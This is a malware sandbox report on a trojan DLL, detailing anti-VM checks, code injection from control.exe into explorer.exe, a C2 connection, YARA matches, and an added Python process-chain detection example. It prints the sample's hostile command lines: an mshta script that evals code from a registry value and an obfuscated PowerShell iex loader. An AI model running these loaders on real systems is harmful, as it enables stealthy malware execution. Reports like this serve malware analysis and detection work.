                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4426
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 389
                      Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: explorer.exe, 00000013.00000000.619226655.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000018.00000000.768961763.0000013857059000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWt
                      Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@1
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: mshta.exe, 00000009.00000003.534167119.0000021937BC4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: mshta.exe, 00000009.00000003.534167119.0000021937BC4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000013.00000000.662218249.0000000007F91000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.189.151.28 80
                      Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF79BDC12E0
                      Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: D48000
                      Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFA73801580
                      Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 2E00000
                      Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFA73801580
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute read
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: 2E00000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 684 base: D48000 value: 00
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 684 base: 7FFA73801580 value: EB
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 684 base: 2E00000 value: 80
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 684 base: 7FFA73801580 value: 40
                      Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 4324
                      Source: C:\Windows\System32\control.exe | Thread register set: target process: 684
                      Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 73801580
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000013.00000000.614468947.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.661504495.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.606382937.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.605773443.0000000001430000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: YProgram Managerf
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.605773443.0000000001430000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01063365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01064B89 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01066D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01063365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara match | File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Source: Yara match | File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara match | File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts1
                      Windows Management Instrumentation
                      Path Interception812
                      Process Injection
                      1
                      Obfuscated Files or Information
                      OS Credential Dumping1
MITRE ATT&CK Matrix

[The ATT&CK matrix table was flattened by extraction: technique cells from all tactic columns, including the mobile ATT&CK columns, ran together and the per-technique signature counts detached from their cells, so the technique-to-tactic layout of this report could not be recovered here.]
Behavior Graph (ID 620333, sample tIJVb0BvkI.dll, start date 04/05/2022, architecture WINDOWS, score 100)

Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 2 other signatures

Process tree (indentation = parent/child; "injected" marks an existing process that received code from its parent in the tree):

loaddll32.exe
  cmd.exe
    rundll32.exe
      network: 185.189.151.28:80 (local port 49758), AS-SOFTPLUSCH, Switzerland
      signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
      control.exe
        signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
        explorer.exe (injected)
          signatures: Self deletion via cmd delete; Disables SPDY (HTTP compression, likely to perform web injects)
          cmd.exe
            signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
            PING.EXE
              network: 192.168.2.1
            conhost.exe
          RuntimeBroker.exe (injected)
mshta.exe
  powershell.exe
    csc.exe
      dropped: C:\Users\user\AppData\Local\...\2tb3qiq3.dll (PE32)
      cvtres.exe
    csc.exe
      dropped: C:\Users\user\AppData\Local\...\5xaibb03.dll (PE32)
      cvtres.exe
    conhost.exe
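Turning a chain like the one above into detection logic means matching a sequence of parent/child (or injector/target) relations, not single events. The block below is an added example, not Joe Sandbox code and not taken from the report: it matches multi-step rules over a process event list constructed from the behavior graph. All PIDs except 6756 (mshta.exe, from the cookbook comments) are invented for illustration, and the rule names and the "started"/"injected" relation labels are this example's own.

```python
"""Match multi-step process-chain rules over sandbox-style process events.

Added example, not part of the Joe Sandbox report. The events below are
constructed from the behavior graph above; PIDs other than mshta.exe's
(6756, from the cookbook comments) are made up for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    pid: int
    name: str
    parent: int     # pid of the process that started it or injected into it
    relation: str   # "started" (normal child) or "injected" (code injected into an existing process)


# Constructed from the behavior graph; PIDs are illustrative except 6756.
EVENTS = [
    Event(100, "loaddll32.exe", 1, "started"),
    Event(101, "cmd.exe", 100, "started"),
    Event(102, "rundll32.exe", 101, "started"),
    Event(103, "control.exe", 102, "started"),
    Event(104, "explorer.exe", 103, "injected"),
    Event(105, "cmd.exe", 104, "started"),
    Event(106, "PING.EXE", 105, "started"),
    Event(107, "conhost.exe", 105, "started"),
    Event(108, "RuntimeBroker.exe", 104, "injected"),
    Event(6756, "mshta.exe", 1, "started"),
    Event(110, "powershell.exe", 6756, "started"),
    Event(111, "csc.exe", 110, "started"),
    Event(112, "cvtres.exe", 111, "started"),
    Event(113, "csc.exe", 110, "started"),
    Event(114, "cvtres.exe", 113, "started"),
    Event(115, "conhost.exe", 110, "started"),
]

# A rule is a list of (process name, relation to the NEXT step). The last
# step's relation is ignored. Names are matched case-insensitively.
RULES = {
    "mshta -> powershell -> csc (Add-Type compile)": [
        ("mshta.exe", "started"), ("powershell.exe", "started"), ("csc.exe", None)],
    "rundll32 -> control.exe (unusual child of rundll32)": [
        ("rundll32.exe", "started"), ("control.exe", None)],
    "control.exe injects explorer.exe": [
        ("control.exe", "injected"), ("explorer.exe", None)],
    "explorer -> cmd -> ping (ping used as sleep)": [
        ("explorer.exe", "started"), ("cmd.exe", "started"), ("ping.exe", None)],
    "powershell -> cmd (control: no match expected here)": [
        ("powershell.exe", "started"), ("cmd.exe", None)],
}


def build_graph(events):
    """Index events by the pid they hang off: parent pid -> list of events."""
    children = defaultdict(list)
    for ev in events:
        children[ev.parent].append(ev)
    return children


def match_rule(rule, events):
    """Return every pid chain [p0, p1, ...] that satisfies the rule in order."""
    children = build_graph(events)
    first_name = rule[0][0].lower()

    def extend(path, step):
        # path already satisfies rule[:step]; try to satisfy rule[step]
        if step == len(rule):
            return [path]
        want_name = rule[step][0].lower()
        want_rel = rule[step - 1][1]      # relation required on the edge into this step
        out = []
        for child in children[path[-1]]:
            if child.name.lower() == want_name and (want_rel is None or child.relation == want_rel):
                out.extend(extend(path + [child.pid], step + 1))
        return out

    matches = []
    for ev in events:
        if ev.name.lower() == first_name:
            matches.extend(extend([ev.pid], 1))
    return matches


def evaluate(events, rules=RULES):
    """Run all rules; return {rule name: list of matching pid chains}."""
    return {name: match_rule(rule, events) for name, rule in rules.items()}


if __name__ == "__main__":
    for name, hits in evaluate(EVENTS).items():
        print(f"{name}: {hits}")
```

Because the injected edge is a separate relation, a rule written as ("control.exe", "started") -> explorer.exe does not fire: in real endpoint telemetry explorer.exe's parent is not control.exe, and the injection has to come from a memory-write/thread event rather than a process-create event.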

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample:
  Source | Detection | Scanner | Label
  tIJVb0BvkI.dll | 48% | ReversingLabs | Win32.Trojan.Jaik
  tIJVb0BvkI.dll | 100% | Joe Sandbox ML | -

